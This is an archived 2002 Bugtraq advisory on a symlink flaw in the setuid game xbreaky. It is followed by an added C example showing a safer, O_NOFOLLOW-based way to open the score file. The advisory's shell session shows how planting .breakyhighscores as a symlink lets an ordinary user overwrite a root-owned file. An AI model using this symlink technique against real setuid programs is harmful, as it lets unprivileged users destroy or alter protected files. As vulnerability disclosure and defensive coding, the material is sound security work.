[27013] in bugtraq


xbreaky symlink vulnerability

daemon@ATHENA.MIT.EDU (Marco van Berkum)
Thu Sep 12 12:41:16 2002

Message-ID: <3D80C09E.4552614E@obit.nl>
Date: Thu, 12 Sep 2002 18:28:14 +0200
From: Marco van Berkum <m.v.berkum@obit.nl>
Reply-To: m.v.berkum@obit.nl
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

-----------------------------------------------------------------------
Title:             xbreaky symlink vulnerability
Author:            Marco van Berkum
Classification:    High risk
Date:              12/09/2002
Email:             m.v.berkum@obit.nl
Company:           OBIT
Company site:      http://www.obit.nl
Personal website:  http://ws.obit.nl
-----------------------------------------------------------------------

About xbreaky
-------------
xbreaky is a breakout game for X written by Dave Brul which can be downloaded
from http://xbreaky.sourceforge.net. xbreaky is added to the OpenBSD ports tree,
NetBSD tree and possibly others.

Problem
-------
By default xbreaky is installed as suid and can be abused to overwrite any file
on the filesystem, by any user.

Vulnerable versions
-------------------
All versions prior to 0.0.5

Exploit
-------
xbreaky writes its highscores to $HOME/.breakyhighscores. When
$HOME/.breakyhighscores is a symlink to another file (*any* file), xbreaky
simply overwrites that file as the root user.

Example
-------
root@animal:/home/marco# echo "bla" >rootfile
root@animal:/home/marco# chmod 600 rootfile
root@animal:/home/marco# exit
logout
marco@animal:~$ ln -s rootfile .breakyhighscores
marco@animal:~$ xbreaky

Now I play a game and set highscore as user "lol", then I exit the game.
It's a nice game btw :)

marco@animal:~$ cat rootfile
cat: rootfile: Permission denied
marco@animal:~$ su -
Password:
root@animal:~# cat /home/marco/rootfile
lol <- voila, our highscore user

Author's response and solution
------------------------------
The author corrected the problem and released xbreaky 0.0.5

Credits
-------
Thanks to Dennis Oelkers for testing.


--
find / -user your -name base -exec chown us:us {}\;
 ----------------------------------------
|    Marco van Berkum / MB17300-RIPE     |
| m.v.berkum@obit.nl / http://ws.obit.nl |
 ----------------------------------------
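
Added example (not part of the original advisory, and not xbreaky's actual 0.0.5 fix, which the advisory does not show): one way a setuid program can open a per-user score file without following a symlink, by acting as the invoking user and passing O_NOFOLLOW. The names open_score_file and demo, the /tmp path and the file contents are constructed for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: open a per-user score file from a setuid binary.
 * Returns an fd, or -1 if the path is a symlink or otherwise unsafe. */
int open_score_file(const char *path)
{
    uid_t saved = geteuid();
    struct stat st;
    int fd;
    if (seteuid(getuid()) != 0)          /* act as the invoking user */
        return -1;
    /* O_NOFOLLOW: fail (ELOOP) if the last path component is a symlink.
     * No O_TRUNC: nothing is modified until the checks below pass. */
    fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW, 0600);
    if (fd >= 0 && (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
                    st.st_nlink != 1 || st.st_uid != getuid())) {
        close(fd);                       /* not a plain file owned by the user */
        fd = -1;
    }
    if (seteuid(saved) != 0)             /* cannot regain saved euid: stop */
        abort();
    return fd;
}

/* Constructed scenario mirroring the advisory, built in a temp directory.
 * Returns 0 if the symlink is refused, its target is intact, a file is ok. */
int demo(void)
{
    char dir[] = "/tmp/scoredemoXXXXXX";
    struct stat st;
    int fd, ok;
    if (!mkdtemp(dir) || chdir(dir) != 0) return -1;
    fd = open("rootfile", O_WRONLY | O_CREAT, 0600);
    if (fd < 0 || write(fd, "bla\n", 4) != 4) return -1;
    close(fd);
    if (symlink("rootfile", ".breakyhighscores") != 0) return -1;
    ok = open_score_file(".breakyhighscores") == -1;    /* symlink refused */
    ok = ok && stat("rootfile", &st) == 0 && st.st_size == 4;
    fd = open_score_file("scores");                     /* plain file accepted */
    if (fd < 0) ok = 0; else close(fd);
    unlink(".breakyhighscores"); unlink("rootfile"); unlink("scores"); rmdir(dir);
    return ok ? 0 : 1;
}

int main(void) { return demo(); }
```

A caller would truncate with ftruncate() and write the scores only after a valid descriptor is returned.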



